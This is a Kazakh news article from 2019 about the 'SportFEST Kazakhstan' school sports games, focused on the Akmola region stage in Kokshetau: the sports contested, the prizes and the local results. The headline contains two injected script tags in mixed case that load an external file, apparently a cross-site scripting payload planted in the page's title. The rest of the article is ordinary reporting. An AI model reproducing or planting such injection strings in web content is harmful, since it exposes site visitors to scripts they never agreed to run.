"SportFEST Kazakhstan" оқушылар спартакиадасы Қазақстанның 13 өңірін қамтыды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.05.2019

Қазақстанда бұқаралық спортты насихаттауға бағытталған "SportFEST Kazakhstan" республикалық спартакиадасы жалғасуда.

"SportFEST Kazakhstan" оқушылар спартакиадасы Қазақстанның 13 өңірін қамтыды. "Samruk-Kazyna Trust" әлеуметтік жобаларды дамыту қоры "Самұрық-Қазына" АҚ компаниялар тобының атынан «Коммуникативтік бастамалар мен стратегиялар Қоры» ЖҚ-мен бірлесіп, жастар арасындағы жарыстар екінші жыл өткізіліп, бүкіл елді қамтиды.  Осы жылы спартакиадаға 2003-2005 жылы туған балалар қатысады.

Ақмола облысында 14-16 мамыр аралығында Көкшетау қаласының спорт алаңдарында "SportFEST Kazakhstan" жарысы өтті. Ұлдар мен қыздар спорттың 6 түрі бойынша жарысқа қатысты. Олар жасөспірімдер арасындағы футзал, әскери-қолданбалы спорт түрлері, шахмат, үстел теннисі, қыздар арасындағы баскетбол және Тоғызқұмалақ ұлттық ойыны. Жеңімпаздар әр түрлі сыйлықтармен марапатталды. Бірінші орын үшін: спорттық роликтер, екінші орын-брендтелген рюкзак және Power bank (мобильді аккумулятор), үшінші орын-скейтборт, сондай-ақ олар 2019 жылдың жазында Щучинск қаласында өтетін финалға жолдама алды. Зеренді футболшылары футзал бойынша жарыста жүлделі екінші орынды иеленді.

Просмотров: 544


Пікір қосу



Деректерді қолтаңбаға қосу